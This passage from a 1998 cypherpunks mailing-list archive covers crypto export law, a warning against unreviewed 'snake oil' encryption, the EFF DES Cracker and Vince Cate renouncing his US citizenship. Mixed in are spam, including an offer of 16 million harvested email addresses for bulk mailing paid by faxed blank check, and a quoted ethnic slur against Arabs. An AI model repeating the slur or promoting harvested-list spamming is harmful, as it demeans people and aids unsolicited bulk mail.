> of encryption software, but the government also appears to be worried that
> Booher has simply made it to easy to use extremely secure
encryption--with or
> without export. Booher's software scrambles data with long 168-bit keys.
>
> The subpoena Booher received also ordered him to bring to the courthouse
the
> source code for his product, suggesting the government wants to reverse
> engineer it.
> Booher intends to patent his source code and says he does not plan to
hand it
> over to anyone.
>
>
http://foxnews.com/js_index.sml?content=/scitech/wires2/0827/t_rt_0827_27.sm
l
> View the Commerce Dept.'s subpoena at http://www.filesafety.com




========= end of forwarded text==========


Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@vendorsystems.com>
Date: Mon, 31 Aug 1998 20:36:06 -0700 (PDT)
To: FTPPork@aol.com
Subject: Re: DES Ecryption
In-Reply-To: <5bdef0da.35eb223f@aol.com>
Message-ID: <v03102800b2111b4d0c11@[204.1.2.2]>
MIME-Version: 1.0
Content-Type: text/plain


>Hey, could anyone tell me what process DES Encryption goes through, or point
>me to a site with the information?
>
>Thanx
>-Buzz-
>P.S. Please no flames because I am on AOL...

This may not be the absolute best place to start but it is certainly current:

<http://www.eff.org/pub/Privacy/Crypto_misc/DESCracker/>

This describes the efforts made to show why a 56 bit key for DES is just
too short for many purposes. You can probably branch out from links you
find there to get more details about S-boxes and other topics.

Steve Bryan
email: sbryan@vendorsystems.com
icq: 5263678
pgp: D758 183C 8B79 B28E 6D4C  2653 E476 82E6 DA7C 9AC5






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 31 Aug 1998 19:43:27 -0700 (PDT)
To: "cdn-firearms-digest@sfn.saskatoon.sk.ca>
Subject: BEWARE of SnakeOil (tm)
Message-ID: <199809010246.WAA26608@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


SNAKEOIL ALERT:
Cc: Cypherpunks@toad.com

On Mon, 31 Aug 1998 18:37:35 -0600, Cdn-Firearms Digest wrote:

>Date: Mon, 31 Aug 1998 15:30:34 -0600
>From: Lee Scroggins <goobr2@ptd.net>
>Subject: New/easy to use strong file encryption fyi
>
>For anyone interested in easy to use strong file encryption, or just
>afraid that your gun related data/Emails may be too tempting for the
>officials, the following article points to an interesting site
>(http://www.filesafety.com).

Maybe his product is valid, but, after having read the the Cypherpunks mailing list for 
years, here are my conclusions:
 
- beware of any product that has not been *extensively* peer-reviewed, with *all* the 
source code made public.  Security breaches are *very* easy to overlook and no software 
should *ever* be used unless it was peer-reviewed.

- the fact that a software uses a specific encryption technique that is described in 
well known books and that this technique is usually recognized as secure by the 
cryptanalysis community doesn't mean that the *specific* software implementation of it 
is truly secure.  Thus, the need not only to peer-review the specific encryption 
technique but *also* and *especially* the precise coding implementation. 

[from their web page] "CryptView will allow you to validate algorithms and examine the 
internals of SecureOffice files. You can see the inside of the cryptography box. 
CryptView allows you to examine file formats and come to your own conclusions about the 
Security of SecureOffice. "

- the fact an encrypted output doesn't look comprehensible to *you* or to a software 
engineer doesn't mean that a cryptanalyst cannot crack it within minutes...  It is a 
*very* complicated science indeed.  If you are not a PhD in cryptanalysis with years of 
experience in software security, you can't know.  One of the NSA top cryptanalyst once 
said that before you spent at least fifteen years of your life cracking codes, you have 
no idea of how to devise a truly secure one.

> Please note that the US govt seems to be having a hissy fit about it
> (you might want to look while it still exists).

They try pursue anybody who violates ITAR in a public way.  If I were to walk with a 
PGP diskette across the border outside Cana-USA, I would be liable under ITAR even if I 
never wrote a line of software in my life.

> Individuals can be charged with violating federal restrictions on the
> export of encryption software, but the government also appears to be 
> worried that Booher has simply made it to easy to use extremely secure
> encryption--with or without export.

Yes, in USA, and it applies to Canada too, encryption software is considered the same 
as missiles for export purposes (category: ammunition).  It is regulated by ITAR, just 
like guns.  But this text borders on being glib.

PGP caused a lot of trouble to his author too, but PGP has been *very extensively* peer 
reviewed.  At least, AFAIK, V2.6.2.  The newer version of PGP uses *several* encryption 
techniques, among which you have to choose.

> The subpoena Booher received also ordered him to bring to the courthouse the
> source code for his product, suggesting the government wants to reverse
> engineer it.

Absolute BS!  The security is afforded by the specific cryptography mathematics that 
are themselves *extensively* well known, peer reviewed and, in the case of 3DES (DES), 
*invented* in government labs!  The other technique, RSA, is used in PGP and the patent 
will expire in a few years.

> Booher intends to patent his source code and says he does not plan to
> hand it  over to anyone.

Un-peer-reviewed code has an excedingly high probability of being snakeoil, especially 
if it is marketed before being reviewed...

A false feeling of security is much more dangerous than no security at all.

All the govts have vested interest in disseminating pseudo-strong cryptography.  This 
statement is not paranoia, it is recent and regularly recurring history.

I find the information in the web page way too incomplete and, to the limit, 
misleading. Personnally, I prefer to stick to PGP.  Version 5.x is *easy* to use.

I do get tired of seeing posts like that around...
One of theses days, I will write a FAQ on encryption for the layman...
If ever I find that this software is appropriate, I will say so on the CFD.
I do not own any interests, direct or indirect, in PGP.

Ciao

jfa

Security is not afforded by a few tools, it is a state of mind.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: clarissa0p@hk.super.net
Date: Sat, 1 Aug 1998 17:32:13 -0700 (PDT)
To: michele0tl@yahoo.com
Subject: Do you market on the Net?
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Dear Internet Marketer,

Are you tired of endlessly posting your ad to online classified sites that
just don't get the job done? The fact is there are over 300 such sites
scattered about the Web and frankly none of them generate enough traffic
to be worth your while. Even when someone does visit one of these sites,
your ad is hopelessly lost in a myriad of similar offerings.

The true professionals of online marketing have known for some time that
nothing creates results the way a direct bulk email campaign does. We have
assembled a complete package on one CD-ROM that will enable to get your
message out to millions for surprisingly little cost and effort.

INTRODUCING...MILLIONS VOL. 1

We took a total of over 92 million email addresses from many of the 
touted CD's that are out there (bought them all - some were $300+)!  We
added the millions we had in storage to those.   When we combined them
all, we had in  excess of 100+ million addresses in one huge file. 

We then ran a super "sort/de-dupe" program against this huge list. 
It cut the file down to less than 25 million!!! Can you believe that? It
seems that most people that are selling CD's are duping the public by
putting numerous files of addresses in the CD over and over. This created
many duplicate addresses. They also had many program
 "generated" email addresses like Compuserve, MCI, ANON's, etc. 
This causes a tremendous amount of undeliverables, and for  those 
that use Stealth programs, clogs up servers quickly with trash, etc. 

We then ran a program that contained 150+ keywords to remove 
addresses with vulgarity,  profanity, sex-related names, postmaster,
 webmaster, flamer, abuse, spam, etc., etc.   Also eliminated all .edu,
mil, .org, .gov, etc.   After that list was run against the remaining
list, it  reduced it down to near 16 million addresses! 

So, you see, our list will save people hundreds of dollars buying all
others that are out there on  CD and otherwise. Using ours will be like
using the 100+ million that we started with, but a lot less money and a
lot less time!!  

Besides the 16 Million general email address we include over 400,000
TARGETED addresses of Business Opportunity Seekers, MLM'ers and
other Internet Marketers. These are people EAGER to hear about your
products and services. 
Other services charge upwards of 5 cents per address for this type of
list. We include it at no extra extra charge when you purchase Millions
Vol. 1

We also included a 5+ million "Remove/Flamer" file broken into seperate
files for ease of  extracting and adding to your own database of removes. 

To help you manage your email lists, you'll find a fully functional
evaluation copy of BulkMate 4.05 on your CD. BulkMate is an indispensible
tool for the serious bulk mailer. Among its 10 utilites are the ability to
filter any address list against a remove list, sort any list
alphabetically and automatically remove dupes, remove specific domains
from any list and count the number of addresses in each list.


 "You can buy from the REST or you can buy from the BEST.   Your choice.
_____________________________

What our clients are saying:

"I received the CD on Friday evening.   Like a kid with a new toy, I
immediately started bulking out using the new email addresses.  Over the
course of the weekend, I emailed out over 500,000 emails and I received
less than TWENTY undeliverables!!  I am totally satisfied with my
purchase!!  Thanks Syrynx!!"

Dave Buckley
Houston,  TX


"This list is worth it's weight in gold!!  I sent out 10,000 emails for my
product and received 185 orders!  

Ann Colby
New Orleans, LA


"I am absolutely delighted! Your support is first rate. When I needed help
you were there for me. I got a real person on the phone. I've been
marketing my product now for two weeks and can't believe how many orders
I've received. I can't thank you enough!

Gail Swanton
Boston, MA


****************************************

                  HERE'S THE BOTTOM LINE

Here is what you get when you order today!

>> 16 Million Email Addresses... 1 per line in simple text format on a CD.
Files are in lots of 100,000 (no codes needed to open files). 
All files are separated by domain name for your convenience.

PLUS you receive a tremendous REMOVE list!

AND

Over 400,000 Targeted email addresses.

AND

The sampling of CyberPromo's HOT list.

AND

BulkMate 4.05 The ultimate mail management tool.

>>> NOW ONLY $149.00!   

All lists are completely free of any Duplicates. We also on a continual
basis, add New Names and Remove Undeliverables and Remove Requests.   

The result is the Cleanest Email Addresses Available Anywhere 
to use over and over again, for a FRACTION of the cost that other 
companies charge. Typical rates for acquiring email lists are from 
1 cent to as high as 3 cents per email address - that's
"INFORMATION HIGHWAY" ROBBERY!.

Don't even hesitate on this one or you will miss out on the most 
effective way to market anywhere..PERIOD!

>>>As a special bonus we've included the entire suite of Earthonline
>>>bulk email and marketing software demos on the CD. Including
>>>the latest version of the DirectMail mailer. Use it free for 10 days !!
>>>You'll also get our  private Website address where you can check
>>> for product upgrades and other valuable marketing information.


To order our email package, simply print out the EZ ORDER FORM 
below and fax or mail it to our office today.

We accept Checks by Fax and Mail and C.O.D.

_________________
EZ Order Form 


_____Yes! I would like to order MILLIONS Vol. 1 email addresses 
for only $149.00.

All orders are sent by US Priority Mail and we pay the shipping costs!

ORDERING OPTIONS

*Mail (USPS)
   *Include a check or money order for the correct amount.
   *Make the check payable to:  Syrynx, Inc.
   *Include your phone number and/or email address in case we need to
   contact you. *Mail to:

       Syrynx, Inc.
       500 Lake Avenue
       Suite 154 
       Lake Worth, Florida  33460

*C.O.D.
   *Fill out the order form completely and write/type COD on the form.
   *Mail the form to the above address or fax to 305-418-7590 *Please have
   a certified/cashiers check or money order in the amount
    of $165.00 payable to Syrynx, Inc ready when the order arrives.
    The additonal $16.00 covers overnight shipping and C.O.D. fees.

*Fax
   *This is the preferred payment method at Syrynx, Inc.
   *ALL FUNDS ARE TO BE IN USA CURRENCY.
   *Your order can be received 24 hours a day, 7 days a week.
   *Print out and complete the following form.
   *To this form, attach a BLANK CHECK with "VOID" written
    somewhere on the body of the check.
   *This gives us the necessary account information to process your order.
   *Please note that Syrynx, Inc. charges a $40.00 fee for ALL BAD CHECKS.
   



Thank you for your order.

Syrynx, Inc.


          **********  MILLIONS VOL.1 ORDER FORM **********

*You must complete the entire form or your order can not be processed.
*You will need to tape the blank check in the space indicated below. *Fill
out and sign the authorization section below.

*Fax the ENTIRE FORM to (305) 418-7590.


*Please, print the following information.


First Name: _______________________________________________________

Last Name: _______________________________________________________

Street Address: ___________________________________________________

_________________________________________________________________

City: ____________________________________________________________

State: _____________________            Zip: _________________________

Phone Number:  __________________________________________________

EMail Address: ___________________________________________________



           * * * * * * * * * *  Authorization  * * * * * * * * * *
                        (leave blank for C.O.D. orders) 

I, ________________________________________________, hereby authorize
Syrynx, Inc. to withdraw $________________________ from my checking
account, account information enclosed, one time only, for the purchase of
the Millions Vol. 1 CD-ROM. I have read and I understand the terms and
conditions as stated above.  The signature below is the authorized
signature of the holder of the checking account.  I understand that
Syrynx, Inc. charges $40.00 for bad checks.  I understand that if the
funds are not available in my account, I agree to pay the amount of this
order plus the $40.00 fee. (Cash or Certified Funds Only).  Authorized
Signature _______________________________________________

Date: __________________ 

order code:mvi

*Attach voided, blank check below. (do not attach check for C.O.D. orders)















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aa1310@hotmail.com
Date: Tue, 4 Aug 1998 22:47:20 -0700 (PDT)
To: Friend@public.com
Subject: w63
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain








BENCHMARK PRINT SUPPLY
1091 REDSTONE LANE
ATLANTA GA 30338

CALL---->       770-399-0953   FOR TONER SUPPLIES ORDERS/PRICING ONLY  

CALL---->       770-399-5505   CUSTOMER SERVICE/SUPPORT ISSUES 
                 
CALL---->       770-399-5614    E-MAIL REMOVAL COMPLAINTS LINE

                                    
OUR  LASER PRINTER/FAX/COPIER TONER CARTRIDGE PRICES
NOW AS LOW AS $39 & UP. SPECIALS WEEKLY ON ALL LASER PRINTER
SUPPLIES. WE CARRY MOST ALL LASER PRINTER CARTRIDGES, FAX SUPPLIES
AND COPIER TONERS AT WAREHOUSE PRICES INCLUDING:

HEWLETT PACKARD SERIES 2/3/4/2P/4P/5P/4L/5L/3SI/4SI/5SI
IBM/LEXMARK OPTRA SERIES 4019/4029/4039/4049/4059
EPSON SERIES 2/1100/1500/6000/7000/8000
NEC SERIES 90/95
CANON COPIER PC SERIES INCLUDING 3/6RE/7/11/320/720/10/20/25 ETC...
HP FAX SERIES 700/720/5000/7000/FX1/FX2/FX3/FX4/FX5
CANON FAX ALL MODELS  
PRICES CHANGE WEEKLY PLEASE CALL TO GET THE MOST
RECENT PRICING/AVAILABILTY AND SPECIALS OF THE WEEK!!!!

PLEASE PLEASE PLEASE  MAKE NOTE OF THE FOLLOWING BEFORE YOU CALL:

-----> WE DO NOT HAVE CATALOGS OR PRICE LISTS BECAUSE OUR PRICES CHANGE WEEKLY!!
-----> WE DO NOT FAX QUOTES OR PRICES BECAUSE OUR ORDER LINE IS NOT SET UP  TO DO THAT
-----> WE DO NOT SELL  TO  RESELLERS OR BUY FROM DISTRIBUTERS
-----> WE DO NOT CARRY : BROTHER -MINOLTA-KYOSERA- PANASONIC - XEROX - FUJITSU - OKIDATA - SHARP!!
-----> WE DO NOT CARRY ANY COLOR PRINTER SUPPLIES!!!!!    
-----> WE DO NOT CARRY DESKJET/INKJET OR BUBBLEJET SUPPLIES!!!!                    

NEW,NEW,NEW $10 MAIL IN REBATE ON SELECTED  CARTRIDGES
SIMPLY ORDER YOUR NEW CARTRIDGE, WHEN IT ARRIVES MAIL BACK                        
YOUR REBATE CERTIFICATE WITH ANY USED CARTRIDGE FOR INSTANT CREDIT

WE ACCEPT ALL MAJOR CREDIT CARDS OR COD ORDERS
CORPORATE ACCOUNTS AVAILABLE WITH APPROVED CREDIT
ALL PACKAGES SHIPPED UPS GROUND UNLESS SPECIFIED OTHERWISE


 










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aa1310@hotmail.com
Date: Wed, 5 Aug 1998 03:06:16 -0700 (PDT)
To: Friend@public.com
Subject: w68
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain








BENCHMARK PRINT SUPPLY
1091 REDSTONE LANE
ATLANTA GA 30338

CALL---->       770-399-0953   FOR TONER SUPPLIES ORDERS/PRICING ONLY  

CALL---->       770-399-5505   CUSTOMER SERVICE/SUPPORT ISSUES 
                 
CALL---->       770-399-5614    E-MAIL REMOVAL COMPLAINTS LINE

                                    
OUR  LASER PRINTER/FAX/COPIER TONER CARTRIDGE PRICES
NOW AS LOW AS $39 & UP. SPECIALS WEEKLY ON ALL LASER PRINTER
SUPPLIES. WE CARRY MOST ALL LASER PRINTER CARTRIDGES, FAX SUPPLIES
AND COPIER TONERS AT WAREHOUSE PRICES INCLUDING:

HEWLETT PACKARD SERIES 2/3/4/2P/4P/5P/4L/5L/3SI/4SI/5SI
IBM/LEXMARK OPTRA SERIES 4019/4029/4039/4049/4059
EPSON SERIES 2/1100/1500/6000/7000/8000
NEC SERIES 90/95
CANON COPIER PC SERIES INCLUDING 3/6RE/7/11/320/720/10/20/25 ETC...
HP FAX SERIES 700/720/5000/7000/FX1/FX2/FX3/FX4/FX5
CANON FAX ALL MODELS  
PRICES CHANGE WEEKLY PLEASE CALL TO GET THE MOST
RECENT PRICING/AVAILABILTY AND SPECIALS OF THE WEEK!!!!

PLEASE PLEASE PLEASE  MAKE NOTE OF THE FOLLOWING BEFORE YOU CALL:

-----> WE DO NOT HAVE CATALOGS OR PRICE LISTS BECAUSE OUR PRICES CHANGE WEEKLY!!
-----> WE DO NOT FAX QUOTES OR PRICES BECAUSE OUR ORDER LINE IS NOT SET UP  TO DO THAT
-----> WE DO NOT SELL  TO  RESELLERS OR BUY FROM DISTRIBUTERS
-----> WE DO NOT CARRY : BROTHER -MINOLTA-KYOSERA- PANASONIC - XEROX - FUJITSU - OKIDATA - SHARP!!
-----> WE DO NOT CARRY ANY COLOR PRINTER SUPPLIES!!!!!    
-----> WE DO NOT CARRY DESKJET/INKJET OR BUBBLEJET SUPPLIES!!!!                    

NEW,NEW,NEW $10 MAIL IN REBATE ON SELECTED  CARTRIDGES
SIMPLY ORDER YOUR NEW CARTRIDGE, WHEN IT ARRIVES MAIL BACK                        
YOUR REBATE CERTIFICATE WITH ANY USED CARTRIDGE FOR INSTANT CREDIT

WE ACCEPT ALL MAJOR CREDIT CARDS OR COD ORDERS
CORPORATE ACCOUNTS AVAILABLE WITH APPROVED CREDIT
ALL PACKAGES SHIPPED UPS GROUND UNLESS SPECIFIED OTHERWISE


 










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 5 Aug 1998 16:29:03 -0700 (PDT)
To: cypherpunks-announce
Subject: ANNOUNCE: SF Bay Area Cypherpunks, Sat Aug 8, Santa Clara & Palo Alto
Message-ID: <199808052329.QAA01100@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


The August meeting of the San Francisco Bay Area Cypherpunks will be
on Saturday, August 8 1998 from 12-6PM.  This is an open meeting, as
always, and the public is invited to attend.

The meeting will be held in two sequential locations this month.
We'll start with a tour of the recently announced Electronic Frontier
Foundation "DES Cracker", hosted by the company which built its
hardware.  Please join us between noon and 2PM at:

	Advanced Wireless Technologies
	3375 Scott Blvd #410 
	Santa Clara, CA  95054
	+1 408 727 5780

	http://www.mapblast.com/mapblast/blast.hm?CMD=MAP&GC=X%3A-121.98298%7CY%3A37.3812%7CLT%3A37.38063%7CLN%3A-121.98458%7CLS%3A20000%7Cc%3ASanta_Clara%7Cs%3ACA%7Cz%3A95054%7Cd%3A807%7Cp%3AUSA&LV=3&IC=37.3812%3A-121.98298&IC=100&IC%3A=AWT&IC=%3A%3A%3A%3A%3A%3A3A&GAD2=3375+Scott+Blvd+%23410&GAD3=Santa+Clara%2C+CA++95054-3110&W=500&H=350&MA=2

It's in a complex of small startups at the corner of Scott Blvd and
Garrett Drive in Santa Clara.  To reach it, take US 101 to the Bowers
Avenue exit (heading south/oceanward), turn right in a few blocks on
Scott Blvd, and turn right on Garrett.  The first two driveways on the
right serve the complex; AWT's corner of the parking lot is at the
second.  You can also come in via Lawrence Expressway; go
east/SanJoseward on Arques Avenue (which becomes Scott Blvd) and turn
left on Garrett.

Autographed copies of the Cracking DES book will be available, and
the machine will be running.

There isn't a room large enough to have a sit-down meeting at AWT, so
we'll reconvene at 2:30 at Stanford University, at the outdoor tables
outside Tresidder Union, which is near the bookstore.  The tables are
on the west side, which is the inside of the U-shape.  Coffee and food
are available in the building.

http://www.stanford.edu/home/map/search_map.html?keyword=&ACADEMIC=Tresidder+Union
http://www.stanford.edu/home/map/stanford_zoom_map.html?234,312

Agenda: 12:00-2:00 at the machine location, 
	then move to Stanford and reconvene at 2:30.
	Dinner at a mutually agreed location will probably follow.

Speakers:
	Cracking DES - John Gilmore et al, 2:30 at Stanford
	"Private Doorbells" - John Bashinski, ~3:30

  -- John Gilmore




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 7 Sep 1998 15:00:52 +0800
To: John Clark <jonkc@worldnet.att.net>
Subject: Re: Shakespeare
In-Reply-To: <000201bdda24$dd4c87e0$0d924d0c@flrjs>
Message-ID: <Pine.BSF.3.91.980905060221.18377A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain





On Mon, 7 Sep 1998, John Clark wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> Tim May tcmay@got.net Wrote:
> 
> >I read part of a book about some pretty convincing evidence that the
> >works of "Shakespeare" were probably written by a member of Queen
> >Elizabeth's royal court.
> 
> I think that's unlikely, the myth probably started because some people can't
> imagine a person without royal blood being a genius.
> 

It is possible that you are both right, to some extent. Shakespeare has
often been accused of borrowing other's works, but the practice was quite
common in his day. If one author could not pull off a successful
presentation of a story line, another would often pick up the idea, refine
it, and present the concept in a somewhat different light. There were no
copyrights in those days. (it was also hard to come by an entire script - 
these were jealously guarded to discourage plagirism - if a play was 
"copied", it was more often from memory of a performance, or from the 
recollection of actors than from the actual script itself)

There were also two distinct forms of theatre; the small indoor
presentations (such as were presented to the royal court) were highbrow,
while the outdoor theatres were sustained by the commoners and varied 
from the serious to the bawdy (or downright vulgar -  the outdoor
theatres were not well received in some social circles, either). It is
entirely possible that a play that failed to gain acceptance, or even an
audience, at a more prestigeous indoor theatre was re-worked by another
author for the Theatre, or even the Curtain (a rowdy playhouse that often 
doubled as a bear pit). Shakespeare may very well have picked up the 
central theme for one(or more) of his works from an obscure indoor play, 
possibly written by a courtier; that doesn't diminish his genius.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Sun, 13 Sep 1998 10:55:46 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism
In-Reply-To: <199809090418.AAA25605@domains.invweb.net>
Message-ID: <v04003a00b21f39f5f22b@[24.1.50.17]>
MIME-Version: 1.0
Content-Type: text/plain



>And it wouldn't have happened had the victorious superpowers decided the
>sand niggers in Palestine could be kicked off their land. (I have no beef
>with those Jews who peacefully bought land in Palestine prior to this mass
>resettlement.)

No doubt the Arabs were being given the shaft. First by the Ottomans
(western lackys that they were) and then by the superpowers themselves
after they could no longer hide behind a puppet regime.

The Arabs didn't make things any better by refusing to accept any Jewish
settlers, including those who had purchased land from first the Ottomans
and then the Palestinians. The Palestinians had been told no harm would
come to those of them who stood aside and warned if they fought or fled
their lands they wouldn't be welcomed back.

When it comes to nations, fairness has historically had little influence on
such outcomes. In the end, all property belongs to those who can keep it
(by whatever means are necessary).

--Steve

---------------------------------------------------------------------
		reply to schear - at - lvcm - dot - com ---

PGP mail preferred, see  	http://www.pgp.com and
				http://web.mit.edu/network/pgp.html

RSA fingerprint: FE90 1A95 9DEA 8D61  812E CCA9 A44A FBA9
RSA key: http://keys.pgp.com:11371/pks/lookup?op=index&search=0x55C78B0D
---------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 7 Sep 1998 00:46:07 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Encryption Expert Says U.S. Laws Led to Renouncing of  Citizenship
Message-ID: <v0401173cb2186ae5e832@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Mon, 07 Sep 1998 11:29:29 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Encryption Expert Says U.S. Laws Led to Renouncing of
  Citizenship
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  New York Times
http://www.nytimes.com/library/tech/yr/mo/cyber/articles/06encrypt.html

September 6, 1998

Encryption Expert Says U.S. Laws Led to Renouncing of Citizenship

By PETER WAYNER

Most people who leave the United States and move to the
Caribbean dream of the freedom of perfect beaches, warm
winters and tropical fruits. Vince Cate says he sees a world where he has
complete freedom to write computer software and send it around the
world.

In 1994, Cate moved to
Anguilla and helped bring
Internet service to the tiny
island. Last Sunday night, he
went a step further and flew to
Barbados, site of the nearest
American consulate, to fill out
the paperwork to renounce his
U.S. citizenship.

Cate, an encryption expert and
one of the sponsors of an
annual academic conference on
financial cryptography in Anguilla, said he made the decision because he
is setting up a new company, Secure Accounts, that will design and build
basic software to handle electronic transactions. The software will rely
heavily on encryption to scramble the data traveling between users in
order to prevent fraud, theft and embezzlement. After renouncing his
citizenship, Cate said in an e-mail message that he wanted "to be free
from the silly U.S. laws on crypto."

Normally, setting up an international company does not require forgoing
citizenship in the United States, but Cate's expertise in creating
encryption software places him in a special class. If he were to offer any
advice to non-U.S. citizens about the encryption work built into his
financial transaction software, he would violate U.S. laws, which treat the
transfer of such encryption as illegal international arms traffic. These laws
apply throughout the world and are intended to stop U.S. citizens from
assisting others in developing encryption software.

"I'm not actually writing any crypto code," Cate said in a telephone
interview on Thursday. "But I'm supervising people who are."

The U.S. government treats secret coding software in the same way it
treats howitzers, tanks and chemical weapons because it can allow
foreigners to hide their communications from U.S. intelligence-gathering
organizations. In past wars, the United States gained important
advantages in the field of battle through carefully gathered information,
and the government does not want to lose what it sees as technical high
ground.

Many American software companies, however, see themselves losing
market share to foreign competitors who are able to create encryption
products unhampered by U.S. laws. They argue that good cryptographic
expertise is already well distributed around the world and that the laws
only give foreign competitors an advantage.

"We can provide a solution that works over the whole planet." Cate said
of his company. "U.S. companies can only provide a solution that is U.S.
only. We certainly have a competitive edge by being offshore."

Recently, many leading software companies like Sun Microsystems and
C2 Net have opened branches outside the United States, hiring foreign
nationals to do the work. This has required a complicated dance to avoid
breaking U.S. export laws like the ones that Cate is escaping.

Steve Walker, the former president of the encryption manufacturer
Trusted Information Systems, said of Cate's move, "All of us have
thought from time to time that we're fed up with things, but in reality it
doesn't accomplish much and you give up a lot."

Sameer Parekh, the president of the Web server company C2 Net, said:
"I think it's essential if you want business that you're doing your
development overseas. It's pretty clear to anyone internationally that
anything exportable [from the United States] is a joke."

C2 Net has development offices in Anguilla and Newbury, England.
Parekh says that there is great demand overseas for programmers who
know cryptography.

Walker agreed that American companies are hurt by the existing laws.
"There are foreign companies out there who are doing very well," he said,
"in part because they're selling products out there that the U.S. can't sell."

Rozell Thompson, a lawyer who specializes in negotiating export licenses,
said of Cate's decision: " I think that's pretty unnecessary in this
particular
case. If you're developing crypto for financial applications, it's exportable
anyways. There's a recognition that cryptography for electronic
commerce applications is going to be exportable."

The government is more lenient with software used by banks and other
financial institutions, in part because it recognizes the great need for such
software and in part because it already receives reports about much of
the transaction data cloaked by the encryption. Thompson said that Cate
would probably have been able to negotiate some sort of license with the
U.S. government, although this would have taken months and would
need to be repeated for each new project.

Cate's move also illuminates a bit of the international market for
citizenship. Before renouncing his U.S. citizenship, Cate became a citizen
of Mozambique for a fee of about $5,000. "This makes me an
American-African," he joked.

Cate's current home, Anguilla, requires people to wait 15 years before
applying for citizenship. He moved there in 1994 and has worked to
establish strong ties. In his spare time, he runs a computer club that
places old computers in the island's schools. "The computer club is also
my best source of talent searching," he said. "I have hired three students
right out of high school because I knew them from the computer club."

Edward Betancourt, a lawyer for the U.S. Department of State, said that
the notion that a person could freely choose their citizenship dates back
to the war of 1812, when British warships would often capture
Americans under the argument that they were really British subjects. He
said: "Most people seem to renounce for family reasons. They haven't
lived in the U.S. for some time and they don't want to deal with another
bureaucracy. Whether a person articulates [the decision] to us or not is
up to them. In most instances, people say 'I'm grateful to the U.S. and it's
not done in anger.'"

In 1996, the latest year for which data is available, 612 people lost their
citizenship. This number includes people like Cate who renounced their
citizenship, as well as others who expatriated themselves by serving in
foreign governments. The government requires a lengthy interview, in part
to determine whether people are leaving for tax reasons and to ensure
that the decision is made correctly.

Right now, Cate sees several advantages in his choice. "There's less
chance of getting in any trouble with the U.S. government and there's also
less chance of getting shot by a terrorist," he said, referring to the recent
actions targeting U.S. citizens.

 Copyright 1998 The New York Times Company
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Mon, 7 Sep 1998 03:26:07 +0800
To: "kryz" <chrisharwig@hetnet.nl>
Subject: Re: "In dreams begin responsibility" - W.B. Yeats
In-Reply-To: <19980904224426.3.MAIL-SERVER@pub1.pub.whitehouse.gov>
Message-ID: <3.0.2.32.19980906142140.008f3740@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



At 06:22 PM 9/5/98 -0000, you wrote:
>
>
>----------
>| Date: vrijdag 4 september 1998 22:44:00
>| From: The White House
>| To: Public-Distribution@pub.pub.whitehouse.gov
>| Subject: 1998-09-04 Remarks by President to Officials of Gateway Computers
>|

---crap cut---


I thought you were dead.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Mon, 7 Sep 1998 04:10:07 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Thoughtcrime
Message-ID: <199809062006.QAA12936@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: Ray Arachelian <sunder@brainlink.com>
   >
   >   IMHO, it shouldn't matter to us who is arrested, whether Jim Bell, Toto,
   >   Anonymous, or Vulis if the crime is nothing more than thoughtcrime.

Whether something is "thoughtcrime" can be shades of grey,
when it involves talk of threats of violence.

